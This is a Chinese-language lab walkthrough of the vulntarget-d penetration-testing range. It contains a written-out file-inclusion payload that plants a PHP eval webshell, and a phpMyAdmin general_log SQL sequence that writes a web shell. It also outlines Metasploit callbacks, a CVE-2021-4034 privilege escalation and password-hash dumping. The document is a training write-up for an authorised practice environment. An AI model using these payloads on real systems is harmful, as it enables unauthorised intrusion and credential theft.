本文作者：NaMi   本文已获得作者授权

vuntarget免责声明

vulntarget靶场系列仅供安全专业人员练习渗透测试技术，此靶场所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用靶场中的技术资料对任何计算机系统进行入侵操作。利用此靶场所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

vulntarget靶场系列拥有对此靶场系列的的修改、删除和解释权限，未经授权，不得用于其他。

vulntarget开源靶场交流群：（群已超过200人，只能通过邀请入群）

目前已经超过200人，请添加下面的二维码为联系人之后，备注：靶场 进群！（一定要记得备注哦）

vulntarget-d 打靶记录

1. 拓扑

修改IP1: 192.168.0.103 kali：192.168.0.105

2. Ubuntu

判断连通性

端口扫描

查看详细信息，由此可以判断出使用的宝塔面板，默认端口8888

81端口开放了一个cms

看到底下的版本信息：

1.可以寻找历史漏洞。2.自己审计

网上也有很多漏洞的复现

好巧，也是乌鸦师傅的文章

文件包含漏洞POC，一套丝滑小连招:

GET : [http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl](http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl)
POST : variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval($_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
GET : [http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl](http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl)
POST : variable=1&tpl=data/Runtime/Logs/Home/22_02_10.log
GET : http://192.168.0.103:81/shell.php

接着访问被BT拦截了：

写入一个phpinfo看一下，disable_function禁用的函数还不少：

没有过滤eval

passthru,exec,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

在第一次请求的时候需要注意shell会被拦截，写$_POST的时候要给$加一个转义否则会写入错误。在markdown中复制这个$是不带的，导致我浪费了一些时间：

variable=1&tpl=<?php fputs(fopen("sh4.php","w"),"<?php eval($_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

这样就拿下了这台机器

3. Ubuntu提权

上线MSF，首先生成一个木马文件：

然后启动一个监听：

将文件下载到目标机器

成功上线：

前段时间出了一个新的提权漏洞CVE-2021-4034，提权到root权限：

在桌面拿到第一个flag:

4. windows机器

看到第二块网卡

添加路由并进行端口扫描，深夜了我就直接针对IP进行端口扫描了，为了早点睡觉。看到开放了如下端口：

挂上代理访问没啥内容：

目录扫描，发现phpmyadmin

l.php是一个探针，而且数据库也是个弱密码

通过phpinfo界面得知了网站的绝对路径：

C:/phpstudy/PHPTutorial/WWW/phpinfo.php

然后通过弱口令进入phpmyadmin，通过写日志拿下webshell:

show global variables like "%genera%";          //查询general_log配置
set global general_log='on';              //开启general log模式
SET global general_log_file='C:/phpstudy/PHPTutorial/WWW/cmd.php';    //设置日志文件保存路径
SELECT '<?php phpinfo();?>';              //phpinfo()写入日志文件
set global general_log='off';              //关闭general_log模式

获取一个普通权限的shell

查看进程，发现了存在火绒：

查看systeminfo发现是一台win7机器，x64位：

5. windows提权

由于机器不出网，搞一个正向shell，并制作一个免杀马。成功上线：

使用这个漏洞提权没成功：

然后就是用了msf自带的getsystem，提权至system权限：

最后抓取hash，admin密码空，crow密码是admin：

读取flag

tips：加我wx，拉你入群，一起学习

扫取二维码获取

更多精彩

乌鸦安全

原文始发于微信公众号（乌鸦安全）：【永久开源】vulntarget-d 打靶记录——作者：NaMi